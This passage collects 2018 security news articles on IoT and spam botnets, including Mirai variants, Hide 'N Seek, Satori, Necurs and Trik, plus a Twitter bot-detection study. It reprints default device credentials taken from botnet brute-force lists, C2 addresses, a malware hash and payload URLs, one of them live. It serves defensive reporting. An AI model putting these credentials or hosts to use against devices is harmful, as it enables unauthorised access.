In a relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
Bot-B connects to Bot-A.
Bot-A creates new connection to Server-X and works as relay between Server-X and Bot-B.
Ramnit campaign 3.png

Further details, including the IoC, are reported in the analysis published by Checkpoint.


Duo Security created open tools and techniques to identify large Twitter botnet

7.8.2018 securityaffairs BotNet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnet.
Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnet.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was composed by using the Twitter’s API, collected records include profile name, tweet and follower count, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots, they include the number of digits in a screen name, Entropy of the screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, average hours tweeted per day, and average “distance” of account age in retweets/replies.

The above heuristics are organized in the 3 categories, the “Account attributes,” “Content,” and “Content Metadata.”

The tools and the techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnet. The experts first identify the automated bots then they use the tool to monitor the evolution of the botnets they belong.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the expert to discover how bots evolve to evade detection.

The experts reported their findings to Twitter that confirmed it is aware of the problem and that is currently working on implementing new security measure to detect problematic accounts.

Twitter botnet

“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”.

Duo Security will release its tools as open source on August 8 during the the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half-a-billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet new reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution in the Belkin NetCam devices.

HomeMatic is a provider of Smart Home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.


The Death botnet grows targeting AVTech devices with a 2-years old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-years old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many products of the vendor currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of payload used by EliteLands is adding accounts with a lifespan of five minutes that execute his payload and then is deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted the EliteLands who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was orginally just to ddos but I have a greater plan on it soon. I dont really use it for attacks only to get customers aware of the power it has.”


Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online many variants emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 had its source code was leaked in early 2015.

In September 2016, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot that is one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits such the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei router tracked as CVE-2017–17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes, the bot propagates only via exploits and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The last variant of Mirai uses the IP 213[.]183.53.120 for both for serving payloads and as a Command and Control (C2) server, the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers was using the same exploits of the previous one but also attempted to carry on credential brute force attacks.

The campaign was tracked as Okane by the name of the binaries downloaded by the shell script to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

mirai okane

Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware by using all the previous exploits code, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs are included in the post published by PaloAlto.


Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.

Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which could suggest the malware was designed to launch distributed denial of service (DDoS) attacks (it can send UDP, TCP SYN, and TCP ACK packets (with a random payload of random length), UDP with random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN).

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems vulnerable to ADB exploitations, but not all of them might be exposed, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might result in these devices becoming accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.


Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago were detailing as well.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

The botnet targets a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution, and a remote code execution in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign was using the same exploits as the first series of attacks, but also attempted credential brute force attacks, some of which are default credentials in Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

The attacks were targeting nearly all exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single-source command.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.


Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours
22.7.2018 securityaffairs BotNet

The popular Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours, and it is also planning to target vulnerable Realtek routers.
NewSky Security first reported the born a new huge botnet, in just one day the botmaster compromised more than 18,000 Huawei routers.

NewSky security researcher Ankit Anubhav announced that the botnet had already infected 18,000 routers. The disconcerting aspect of the story is that the hacker gathered a so huge number of devices in a limited period of time, without using any zero-day issue.

The same botnet was today reported by experts from other security firms, including Qihoo 360 Netlab, Greynoise, and Rapid7.

360 Netlab
@360Netlab
We were tracking this botnet yesterday, the claimed 18000+ huawai router number is probably inflated, as we were able to take a peek at the file which highly likely stored the infected ips, the total count was 10901. and attached is the graphic of the C2 for this botnet, big one.

Ankit Anubhav
@ankit_anubhav
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n

View image on Twitter
3:43 AM - Jul 19, 2018
39
38 people are talking about this
Twitter Ads info and privacy
The botmaster has infected systems by exploiting the CVE-2017-17215 vulnerability in Huawei HG532 routers. Experts noticed that the attackers started scanning for the flaw, that could be triggered via port 37215, on July 18.
Anarchy botnet
The botmaster is a hacker that goes online with the moniker “Anarchy,” according to Anubhav he was previously identified as Wicked and was involved in the born of the homonymous Mirai variant.

The Wicked Mirai botnet was first spotted by researchers at Fortinet, and Anubhav published on the NewSky’s blog and interview with the hacker.

Wicked/Anarchy is believed to be the threat actor behind other Mirai variants, including, Omni, and Owari (Sora).

As explained at the beginning of this post, Anarchy did not use any specific exploit to gather tens of thousands of devices in a few hours. The CVE-2017-17215 is a well-known vulnerability that was used by many other botnets, including the Mirai Satori, to gather zombies.

The CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

The exploit code used to target the Huawei routers is publicly available, in December Ankit Anubhav discovered it on Pastebin.com..

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” stated a blog post published by Anubhav.

At the time, the exploit code for the CVE- 2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk, it could become a commodity in the criminal underground, vxers could use it to build their botnet.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code, earlier in December, the author of the Brickerbot botnet that goes online with the moniker “Janitor” released a dump which contained snippets of Brickerbot source code.

NewSky Security analyzed the code and discovered the usage of the exploit code CVE-2017–17215, this means that the code was available in the underground for a long.

According to Bleeping Computer, Anarchy told Anubhav that he also plans to target the CVE-2014-8361 flaw in Realtek routers that is exploitable via port 52869.

“Testing has already started for the Realtek exploit during the night,” Anubhav told Bleeping Computer in a private conversation today. [Update: Both Rapid7 and Greynoise are confirming that scans for Realtek have gone through the roof today.]

Below the md5 and the C&C associated with the threat:

Ankit Anubhav
@ankit_anubhav
· 18 Jul
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n pic.twitter.com/qOATps9Dmv

Ankit Anubhav
@ankit_anubhav
The attacker Anarchy has shared a list of infected victim IPs which at that point, I am not making public for obvious reasons. The bin in his botnet md5 >
c3cf80d13a04996b68d7d20eaf1baea8

As one can see, it uses only 1 exploit, 2017-17215. 2/n pic.twitter.com/F5BNNbf3bM

8:27 PM - Jul 18, 2018
View image on Twitter
9
See Ankit Anubhav's other Tweets
Twitter Ads info and privacy

SMII Mondher
@smii_mondher
Ketashi botnet
hxxp://104.244.72.82
hxxp://104.244.72.82/sister
hxxp://104.244.72.82/k
http://104.244.72.82/gpon#ketashi @360Netlab @ankit_anubhav @campuscodi

4:17 PM - Jul 19, 2018
3
See SMII Mondher's other Tweets


Hide 'N Seek IoT Botnet Can Infect Database Servers
18.7.2018 securityweek BotNet

The Hide 'N Seek Internet of Things (IoT) botnet has recently added support for more devices and can also infect OrientDB and CouchDB database servers, Qihoo 360's NetLab researchers say.

When first detailed in January this year, the botnet was evolving and spreading rapidly, ensnaring tens of thousands of devices within days. Targeting numerous vulnerabilities, the malware was capable of data exfiltration, code execution, and interference with the device operation.

By early May, the malware had infected over 90,000 devices, added code to target more vulnerabilities, and also adopted persistence, being able to survive reboots. The persistence module, however, would only kick in if the infection was performed over the Telnet service.

A peer-to-peer (P2P) botnet, Hide 'N Seek has continued to evolve, and is currently targeting even more vulnerabilities than before. The botnet now also includes exploits for AVTECH devices (webcam) and Cisco Linksys routers, Qihoo 360's NetLab reveals.

Furthermore, the malware now includes 171 hardcoded P2P node addresses, has added a crypto-currency mining program to its code, and has also evolved into a cross-platform threat, with the addition of support for OrientDB and CouchDB database servers.

The botnet’s spreading mechanism includes a scanner borrowed from Mirai, targeting fixed TCP port 80/8080/2480/5984/23 and other random ports.

For infection, the malware attempts remote code execution using exploits targeting TPLink Routers, Netgear routers (also targeted by Reaper botnet and Mirai variant Wicked), AVTECH cameras, Cisco Linksys Routers, JAW/1.0, OrientDB, and Apache CouchDB.

The Hide 'N Seek bots attempt to contact other P2P peers using one of three methods: a hard-coded built-in list of 171 peer addresses, command-line arguments, and via other P2P peers. The node would also interact with the 171 peers for check-in purposes and during the follow-up interaction process.

“When started with no command-line args, HNS node will send lots of UPD check-in packets. IP addresses of these packets are randomized, while some others are set based on the build-in list,” the NetLab researchers explain.

Due to its peer-to-peer architecture, the botnet is rather difficult to shut down. Furthermore, the constant stream of updates received over the past half a year suggests that Hide 'N Seek will continue to evolve, likely broadening its capabilities and target list.


HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet

The HNS IoT botnet (Hide and Seek) originally discovered by BitDefender in January evolves and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?

The IoT botnet Hide ‘N Seek botnet appeared in the threat landscape in January, when it was first spotted on January 10th by malware researchers from Bitdefender. It was first discovered on January 10, then it disappeared for a few days, and appeared again a few weeks later infecting in less than a weeks more than 20,000 devices.

HNS botnet

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

HNS botnet looks for systems to infect by scanning the Internet for fixed TCP port 80/8080/2480/5984/23 and other random ports. The HNS botnet borrows code from Mirai botnet.

HNS botnet scanning.png

The Hide ‘N Seek is now targeting also cross-platform database solutions, it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

“2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.

“some major updates we see:

Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
TPLink-Routers RCE
Netgear RCE
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that the HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.

Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.


Necurs Campaign Uses Internet Query File Attachments
26.6.2018 securityweek  BotNet

The Necurs botnet has been using Internet Query (IQY) files in recent waves of spam attacks in an effort to thwart security protections.

Active since at least 2012 and currently considered to be the largest spam botnet, the operation has been famous for powering massive Locky ransomware campaigns in 2016 and 2017. The botnet ended last year with a spike in activity and was sending tens of millions of spam emails daily.

This pas April, the botnet was observed using .URL files with modified icons to trick users into believing they are opening a different file type. The files would leverage the Server Message Block (SMB) protocol to execute a payload from a remote server, thus successfully evading certain spam filters.

Necurs has now switched to a new tactic to avoid detection and increase chances of successful infection. Text files with a specific format, IQY files allow users to import data from external sources into Excel spreadsheets, and Windows automatically executes them in Excel.

The spam emails using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts, Trend Micro reveals in a new report.

Once executed, the IQY file queries to the URL indicated in its code. This results in data being pulled from the targeted URL into an Excel worksheet.

The fetched data, Trend Micro discovered, contains a script that abuses Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and start a PowerShell process. Through this process, a remote PowerShell script is executed filelessly on the targeted system.

The script was designed to download an executable file, a Trojanized remote access application, and its final payload: the FlawedAMMYY backdoor. The malware was supposedly built using the leaked code of the Ammyy Admin remote access Trojan.

As part of more recent attacks, the script would download an image file before the final payload. This image, the security researchers say, is a disguised malware downloader that fetches an encrypted component file containing the same main backdoor routines.

FlawedAMMYY was designed to execute a series of commands from a remote malicious server, including file manager, view screen, remote control, audio chat, RDP SessionsService – Install/Start/Stop/RemoveDisable desktop background, disable desktop composition, disable visual effects, and show tooltip – mouse cursor blinking cause.

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro notes.

To stay protected against such threats, strict security protocols and best practices are essential. Also, because this is a known attack vector, users receive two warning messages upon execution of the IQY file attachment, paying attention to those warnings can stop the infection.


Satori botnet is back again, experts observed a surge in port scan activity associated with it
17.6.2018 securityaffairs BotNet

This week, security experts observed a surge in port 8000 scan activity, researchers at Qihoo 360 Netlab determined that the unusual activity was associated with Satori IoT botnet.
Experts from Qihoo 360 Netlab discovered that the author of the Satori botnet have integrated a the proof-of-concept (PoC) code for the XionMai web server software package after it was published on June 8.

The code recently included in the Satori botnet exploits a buffer overflow vulnerability, tracked as CVE-2018-10088, in XionMai uc-httpd 1.0.0. The exploit could be used by remote attackers to execute arbitrary code by sending a malformed package via ports 80 or 8000.

“Two days ago, on 2018-06-14, we noticed that an updated Satori botnet began to perform network wide scan looking for uc–httpd 1.0.0 devices.” reads the report published by Qihoo 360 Netlab.

“Most likely for the vulnerability of XiongMai uc–httpd 1.0.0 (CVE-2018-10088). The scanning activities led to a surge in scanning traffic on ports 80 and 8000.”

Satori botnet scan-on-port-80

Satori botnet scan-on-port-8000

The lightweight web server package XionMai is often included in the firmware of many IoT devices from Chinese vendors.

Data collected by honeypots used by Qihoo 360 Netlab and SANS ISC confirms the Satori authors also included a second exploit, it allows the bot to target D-Link DSL-2750B devices.

The experts observed port 8000 scans drop down on June 15, the attackers started exploiting the PoC code against D-Link DSL-2750B routers exploited via ports 80 and 8080.

Satori botnet scan on port 8080

The experts started seeing a surge in scans for the above ports, instead of port 8000 associated with XionMai.

Data collected by security experts demonstrate the evolution of the Satori botnet, its author continues to include new exploit to make the botnet resilient to the takedown of law enforcement and security firm.

Further details, including Indicators of compromise (IoCs) for the Satori botnet are available in Qihoo 360 Netlab report.


Researcher found 43 Million email addresses leaked by the Trik spam botnet
14.6.2018 securityaffairs  BotNet

A security researcher from Vertek Corporation reported to Bleeping Computer that over 43 million email addresses have been leaked from the command and control server of a spam botnet.
An expert from Vertek Corporation spotted the C&C server while investigating a recent malware campaign distributing a version of the Trik trojan. The malicious code was used as a first-stage malware that was used to drop, which was used to drop GandCrab v3 ransomware.

Malware experts from the Proofpoint firm have recently begun tracking the Phorpiex/Trik botnet that was used by sophisticated threat actors to distribute a range of malware.

“It is not especially sophisticated or complex but has been active for almost a decade, flying under the radar and attracting a solid customer base of threat actors.” reads the analysis published by Proofpoint.

“As we began tracking this botnet more closely, we discovered that a number of familiar actors were repeatedly leveraging Trik’s power and distribution capabilities for delivery of their malware.”

Both malware would download the malicious files from a misconfigured server located on a Russian IP address.

The content of the server was accessible to anyone, the researcher discovered 2201 text files, labeled sequentially from 1.txt to 2201.txt containing chunks of roughly 20,000 email addresses, each.

“The Vertek researcher believes the operators of this server have been using these recipient lists to service other crooks who contracted their services to distribute various malware strains via malspam campaigns.” reported Bleeping Computer.

spam leak Trik trojan

“We pulled all of them to validate that they are unique and legitimate,” the researcher told Bleeping Computer earlier today. “Out of 44,020,000 potential addresses, 43,555,741 are unique.”

The researcher shared its findings with working with the popular cyber security expert Troy Hunt that runs the Have I Been Pwned service, to determine the origin of the data.

The huge trove of email addresses is from everywhere, the expert counted 4.6 million unique email domains (i.e. .gov, .com, and domain of several private businesses).

The vast majority of email addresses are old, (Yahoo (10.6 million) and AOL (8.3 million)).

“Surprisingly, while there are many custom email domains included in the leak, there are very few Gmail addresses included, suggesting the email addresses database is either incomplete, or this malware campaign intentionally targeted users using older email services.” continues Bleeping Computer.

The Trik C&C server discovered by the expert is going offline at intermittent intervals.

Below the Top 10 email domains included in the leaked data:

8907436 yahoo.com
8397080 aol.com
788641 comcast.net
433419 yahoo.co.in
432129 sbcglobal.net
414912 msn.com
316128 rediffmail.com
294427 yahoo.co.uk
286835 yahoo.fr
282279 verizon.net


IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take best security measures to keep their infrastructure safe.
A variant of IoT botnet, called Owari, that relies on default or weak credentials to hack insecure IoT devices was found itself using default credentials in its MySQL server integrated with command and control (C&C) server, allowing anyone to read/write their database.
Ankit Anubhav, the principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly week username and password combination for their C&C server's database.


Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
